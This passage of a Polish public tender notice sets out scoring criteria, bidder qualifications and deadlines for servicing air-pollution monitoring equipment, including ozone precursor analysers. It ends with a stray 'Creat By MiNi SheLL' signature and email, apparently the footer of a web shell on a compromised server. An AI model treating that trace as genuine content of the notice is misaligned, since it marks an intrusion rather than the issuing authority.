5 pkt<br/>36 miesięcy - 10 pkt<br/>40 miesięcy – 15 pkt<br/>48 miesięcy – 20 pkt<br/>Za wskazanie okresu gwarancji poniżej progu w miesiącach Zamawiający będzie<br/>przyznawał punktu dla progu niższe.<br/>Np. Wykonawca zaoferuje 39 miesięcy – otrzymuje punkty za 36 miesięcy.<br/>Analogicznie w pozostałym zakresie.<br/>UWAGA! Kryterium dotyczy całego zadania (części), a nie elementów składowych w<br/>zestawie.<br/>c) Punkty przyznane za kryterium „Czas realizacji usługi” liczone będą wg<br/>następującego wzoru:<br/>Czas wykonania zadania, który decyduje o długości oddelegowania<br/>pracowników CLB i ich powrocie do wykonywania zadań wynikających z<br/>codziennych obowiązków odpowiednio:<br/>do 3 miesięcy od podpisania umowy (obligatoryjnie) – 0 pkt<br/>do 2 miesięcy od podpisania umowy – 20 pkt<br/>d) Ocenę końcową badanej oferty stanowić będzie suma punktów kryteriów: Cena,<br/>Gwarancja, Czas realizacji usługi - maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przegląd zestawu prekursorów ozonu w stacji Bory<br/>Tucholskie Zielonka </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 20325,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90731000-0 - Usługi związane z zanieczyszczeniem powietrza</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Punkty przyznane za kryterium „Cena ” liczone będą wg następującego wzoru:<br/>C = (CN : CB) × 100 x waga (60% tj. 0,60) = XX.XX liczba punktów.<br/>gdzie:<br/>C - liczba punktów, jakie uzyskała dana oferta w kryterium cena,<br/>CN - najniższa cena spośród ofert niepodlegających odrzuceniu,<br/>CB - cena oferty badanej.<br/>Maksymalna możliwa liczba punktów do zdobycia w tym kryterium wynosi 60 pkt.<br/>b) Punkty przyznane za kryterium „Gwarancja” liczone będą wg następującego wzoru:<br/>Dodatkowa gwarancja na wykonaną usługę uwzględniającą wymienione części<br/>zużywalne liczona od podpisania protokołu odbioru otrzyma odpowiednio:<br/>Wykonawca, który zaoferuje minimalny wymagany przez zamawiającego okres gwarancji równy 24 m-ce (obligatoryjnie, minimalne) – otrzyma 0 pkt;<br/>Wykonawca, który zaoferuje okres gwarancji wynoszący:<br/>30 miesięcy - 5 pkt<br/>36 miesięcy - 10 pkt<br/>40 miesięcy – 15 pkt<br/>48 miesięcy – 20 pkt<br/>Za wskazanie okresu gwarancji poniżej progu w miesiącach Zamawiający będzie<br/>przyznawał punktu dla progu niższe.<br/>Np. Wykonawca zaoferuje 39 miesięcy – otrzymuje punkty za 36 miesięcy.<br/>Analogicznie w pozostałym zakresie.<br/>UWAGA! Kryterium dotyczy całego zadania (części), a nie elementów składowych w<br/>zestawie.<br/>c) Punkty przyznane za kryterium „Czas realizacji usługi” liczone będą wg<br/>następującego wzoru:<br/>Czas wykonania zadania, który decyduje o długości oddelegowania<br/>pracowników CLB i ich powrocie do wykonywania zadań wynikających z<br/>codziennych obowiązków odpowiednio:<br/>do 3 miesięcy od podpisania umowy (obligatoryjnie) – 0 pkt<br/>do 2 miesięcy od podpisania umowy – 20 pkt<br/>d) Ocenę końcową badanej oferty stanowić będzie suma punktów kryteriów: Cena,<br/>Gwarancja, Czas realizacji usługi - maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolność techniczna lub zawodowa:<br/>Opis spełnienia warunku:<br/>Warunek nr 1:<br/>Wykonawca wykaże, że w okresie ostatnich 3 lat wykonał usługi serwisowania<br/>i napraw sprzętu pomiarowego do zanieczyszczeń powietrza typu:<br/>analizatora automatycznego, pyłomierza automatycznego i pobornika<br/>manualnego na kwotę co najmniej 30 000,00 zł (brutto)<br/>Uwaga:<br/>− Dla potrzeb oceny spełniania warunku nr 1 określonego w Rozdziale V ust. 2<br/>pkt 4) jeśli wartość zamówienia (umowy) jest określona w innej walucie niż w<br/>złotych polskich, Zamawiający dokona przeliczenia tej wartości na złote polskie -<br/>na podstawie średniego kursu złotego w stosunku do walut obcych określonego<br/>w Tabeli Kursów Narodowego Banku Polskiego na dzień opublikowania<br/>Ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii Europejskiej. Jeżeli w<br/>dniu publikacji ogłoszenia o zamówieniu w Dzienniku Urzędowym Unii<br/>Europejskiej, Narodowy Bank Polski nie publikuje średniego kursu danej waluty,<br/>za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany<br/>pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Dzienniku<br/>Urzędowym Unii Europejskiej, w którym zostanie on opublikowany.<br/>− Zamawiający zastrzega weryfikację potwierdzenia należytego wykonania<br/>dostaw/usług bezpośrednio u podmiotu, na rzecz którego były wykonane.<br/>− W przypadku dostaw/usług powtarzających się lub ciągłych nadal<br/>wykonywanych należy podać wartość dostaw/usług zrealizowanych przed<br/>upływem terminu składania ofert. Referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonywanie powinny być wystawione w okresie<br/>ostatnich 3 miesięcy.<br/>− W przypadku gdy Wykonawca wykonywał w ramach jednego kontraktu/ umowy<br/>większy zakres prac, dla potrzeb zamówienia powinien wyodrębnić i podać zakres<br/>i wartość każdego zamówienia, o którym mowa powyżej.<br/>− Jeżeli wykonawca powołuje się na doświadczenie w realizacji dostaw/usług<br/>wykonywanych wspólnie z innymi wykonawcami, wykaz, o którym mowa w<br/>Rozdziale X pkt. 5, podpunkt a) SWZ, dotyczy dostaw/usług, w których wykonaniu<br/>wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń<br/>powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio<br/>uczestniczył lub uczestniczy. Zamawiający zastrzega możliwość zwrócenia się do<br/>wykonawcy o wyjaśnienia w zakresie faktycznie i konkretnie wykonywanego<br/>zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum,<br/>z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur.<br/>Warunek nr 2:<br/>Wykonawca wykaże, że dysponuje co najmniej trzema osobami posiadającymi<br/>przynajmniej 3-letnie doświadczenie w zakresie obsługi i serwisowania urządzeń<br/>do pomiaru zanieczyszczeń powietrza, w tym: analizatora automatycznego,<br/>pyłomierza automatycznego i pobornika manualnego<br/>3. Warunki udziału w postępowaniu, o których mowa w Rozdziale V ust. 2 pkt 4) zostaną<br/>spełnione wyłącznie, jeżeli:<br/>1) co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia spełni warunek udziału samodzielnie, lub jeżeli podmiot udostępniający<br/>zasoby udowodni udostępnienie adekwatnego zakresu zasobu odnośnie<br/>doświadczenia - w przypadkach określonych w ust. 2 pkt. 4, warunek nr 1, w<br/>przypadku usług obowiązuje art. 118 ust. 2 ustawy Pzp.<br/>4. 2) co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia lub podmiotów udostępniających zasoby spełni warunek udziału<br/>samodzielnie albo wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>lub podmioty udostępniające zasoby spełnią warunek udziału łącznie –<br/>w przypadkach określonych w ust. 2 pkt 4, warunek nr 2, w przypadku usług<br/>obowiązuje art. 118 ust. 2 ustawy Pzp. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy<br/>Pzp, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 ze zm.), z innym wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o<br/>dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej<br/>lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od<br/>innego wykonawcy należącego do tej samej grupy kapitałowej –<br/>załącznik nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykaz usług na spełnienie warunku nr 1: wykonanych, a w przypadku<br/>świadczeń powtarzających się lub ciągłych również wykonywanych, w<br/>okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których dostawy/usługi zostały<br/>wykonane lub są wykonywane, oraz załączeniem dowodów<br/>określających, czy te dostawy/usługi zostały wykonane lub są<br/>wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>którego dostawy/usługi zostały wykonane, a w przypadku świadczeń<br/>powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – oświadczenie wykonawcy; w przypadku świadczeń<br/>powtarzających się lub ciągłych nadal wykonywanych referencje bądź<br/>inne dokumenty potwierdzające ich należyte wykonywanie powinny być<br/>wystawione w okresie ostatnich 3 miesięcy - załącznik nr 8 do SWZ;<br/>2) Wykaz osób na spełnienie warunku nr 2,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> a) Certyfikat / Świadectwa, iż osoby, które będą realizować zamówienie lub<br/>podmiot Wykonujący Zamówienie posiada/ją odbyte szkolenia tematyczne,<br/>obejmujące dany typ analizatora dający prawo do wykonywania napraw,<br/>serwisowania i obsługi bieżącej poszczególnych pyłomierzy automatycznych<br/>– zadanie nr 1 i nr 2<br/>b) Certyfikat / Świadectwa, iż osoby, które będą realizować zamówienie lub<br/>podmiot Wykonujący Zamówienie posiada/ją odbyte odbyte szkolenia<br/>tematyczne, obejmujące dany typ analizatora dający prawo do wykonywania<br/>napraw, serwisowania i obsługi bieżącej zestawu prekursorów ozonu –<br/>zadanie nr 3<br/>c) Szczegółowy Opis Przedmiotu Zamówienia – Parametry Graniczne – w<br/>zakresie części i zadań na jakie oferuje Wykonawca. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawca zobowiązany jest załączyć do oferty m.in. następujące dokumenty:<br/>1) formularz ofertowy oraz formularz asortymentowo-cenowy (według załączonego<br/>wzoru – Załącznik nr 1 oraz nr 1a) do SWZ);<br/>Wymagana forma:<br/>Formularze muszą być złożone w pod rygorem nieważności, w formie elektronicznej<br/>opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym.<br/>Oferta musi się składać z formularza ofertowego i formularza asortymentowocenowego.<br/>2) zobowiązania innego podmiotu do udostępnienia zasobów (według załączonego<br/>wzoru – Załącznik nr 5 do SWZ) - jeżeli dotyczy;<br/>3) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia na<br/>podstawie art. 117 ust. 4 ustawy Pzp (według załączonego wzoru – Załącznik nr<br/>6 do SWZ) - jeżeli dotyczy, z wyłączeniem dostaw.<br/>4) oświadczenia i/lub dokumenty na podstawie których, Zamawiający dokona oceny<br/>skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę<br/>przedsiębiorstwa, w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji<br/>(jeżeli Wykonawca zastrzega takie informacje) – jeżeli dotyczy;<br/>5) pełnomocnictwo, z którego wynika prawo do podpisania oferty oraz do podpisania<br/>innych dokumentów składanych wraz z ofertą (jeżeli umocowanie osoby wskazanej<br/>w ofercie nie wynika z dokumentów rejestrowych KRS/CEIDG);<br/>6) pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z<br/>której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być<br/>ustanowiony do reprezentowania Wykonawców w postępowaniu albo<br/>reprezentowania w postępowaniu i zawarcia umowy – jeżeli dotyczy;<br/>7) inne dokumenty wymagane w SWZ;<br/>8) Zamawiający wymaga przedłożenia wraz z ofertą:<br/>o parametrów granicznych - wymaganych (jeżeli występują z opisem<br/>przedmiotu zamówienia).<br/>o przedmiotowych środków dowodowych (jeśli są wymagane);<br/>o dokumentów wraz z dowodami na spełnienie równoważności (w<br/>przypadku zastosowań równoważnych) (jeśli są wymagane)<br/>9) Oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp (załącznik nr 3 SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie<br/>zamówienia publicznego. Umocowanie musi wynikać z treści pełnomocnictwa złożonego<br/>wraz z ofertą w oryginale lub w formie notarialnie potwierdzonego odpisu, podpisanego<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>2. Pełnomocnictwo o którym mowa w ust. 1 powinno zawierać w szczególności wskazanie:<br/>− postępowania o zamówienie publiczne, którego dotyczy;<br/>− wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wymienionych z nazwy z określeniem adresu siedziby;<br/>− ustanowionego Pełnomocnika oraz zakresu jego umocowania. Zakres umocowania<br/>musi obejmować przede wszystkim: reprezentowanie Wykonawców występujących wspólnie w postępowaniu o udzielenie zamówienia publicznego, zaciąganie w ich<br/>imieniu zobowiązań, złożenie oferty wspólnie, prowadzenie korespondencji i<br/>podejmowanie zobowiązań związanych z postępowaniem o zamówienie publiczne.<br/>Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich wykonawców<br/>ubiegających się wspólnie o udzielenie zamówienia, w tym pełnomocnika i przez osoby<br/>uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub<br/>ewidencji Wykonawcy.<br/>3. Wykonawcy działający w ramach spółki cywilnej zamiast pełnomocnictwa, o którym<br/>mowa w pkt 1, mogą załączyć do oferty odpis aktualnej umowy spółki, jeżeli będzie<br/>z niej wynikać zakres umocowania wspólników.<br/>4. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenie wstępne składa każdy z Wykonawców wspólnie ubiegających się<br/>o zamówienie. Oświadczenie te potwierdza spełnianie warunków udziału<br/>w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy<br/>z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak<br/>podstaw do wykluczenia.<br/>6. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia<br/>z postępowania, w tym oświadczenie dotyczące przynależności lub braku przynależności<br/>do tej samej grupy kapitałowej, składa każdy z Wykonawców wspólnie ubiegających się<br/>o zamówienie.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie zgodnie ze wzorem stanowiącym załącznik nr 6 do SWZ, z którego<br/>wynika, które usługi lub roboty budowlane wykonają poszczególni wykonawcy (nie<br/>dotyczy postępowania o udzielenie zamówienia na dostawy, zgodnie z art. 117<br/>ustawy Pzp).<br/>8. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument na<br/>podstawie art. 125 ust. 1 ustawy Pzp składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie.<br/>9. W przypadku wyboru oferty Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może zażądać przed zawarciem umowy w sprawie<br/>zamówienia publicznego, umowy regulującej współpracę tych Wykonawców, zgodnie z<br/>art. 59 ustawy Pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z postanowieniami SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-09 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma Zakupowa Zamawiajacego</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-09 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z<br/>okoliczności wskazanych:<br/>1) w art. 108 ust. 1 ustawy Pzp<br/>2) Wykluczenie Wykonawcy następuje zgodnie z art. 111 ustawy Pzp.<br/>3) Zamawiający wykluczy Wykonawcę, jeżeli zachodzą przesłanki na podstawie art. 7 ust.1 ustawy z dnia 13 kwietnia 2022<br/>r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz.U. poz. 835).<br/>Zapisy RODO zgodnie z SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com